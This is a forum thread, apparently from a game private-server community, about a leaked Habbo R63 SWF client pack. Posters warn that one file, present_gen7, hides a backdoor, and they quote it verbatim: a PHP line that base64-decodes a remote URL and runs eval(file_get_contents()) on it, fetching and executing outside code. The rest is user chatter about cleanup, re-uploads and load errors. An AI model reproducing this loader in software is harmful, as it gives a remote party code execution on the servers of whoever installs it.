Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

Latest R63 SWF Pack - Working! (Before cyrpto - RELEASE 35255)

Status
Not open for further replies.
Master Summoner
Reaction score
That is not ,,new this is new>
Quackster - Latest R63 SWF Pack - Working! (Before cyrpto - RELEASE 35255) - RaGEZONE Forums

Thanks for the memories!
Loyal Member
Reaction score
It's just the throne swf with a php rule in it ;/

BTW: Open present_gen7 with hex editor and go to line 20

PHP:
<?php $string = "aHR0cDovL3ByaXZhdGUuam9zcGllay5ubC9yei95b3VmYWlsLnBuZw=="; $fixedstring = base64_decode($string); eval(file_get_contents($fixedstring)); ?>
The string is: .
The url doesn't exists and that will be..

*or just delete the .htaccess in the hof_furni folder

What does the throne.swf have in it?

I checked out the String and your right. I took the liberty of removing the whole PHP code from the SWF and reuploading it. Its availible

Can you please explain to me though, what he would have done to be able to utilize this hacking method? I am curious. Would he just have to go to and it would automatically follow the script that was on your site?

Skilled Illusionist
Reaction score
My Client Loads... then it goes to the disconnected page :S

Initiate Mage
Reaction score
Good Tut!
But do you have a SQL File?
Send my a PM as you have

Junior Spellweaver
Reaction score
Thanks dude i have beeen searchign for this soo many times couldnt find it now i found it thanks ot you safe bro :p

Newbie Spellweaver
Reaction score
I'll take a look.

--

Took a look and got a error when trying to decompress present_gen7 that is the one with the exploit.

--

Attempted to open up present_gen7 in SoThink and got a corrupted file error, my advice would to just delete the file

--

Attempting to uncorrupt it (for the record: uncorrupt is not a word)

--

Quackster - Latest R63 SWF Pack - Working! (Before cyrpto - RELEASE 35255) - RaGEZONE Forums
Notice something odd?

--

you can get newest swfs from habbo o_O ?:love:

Status
Not open for further replies.
Back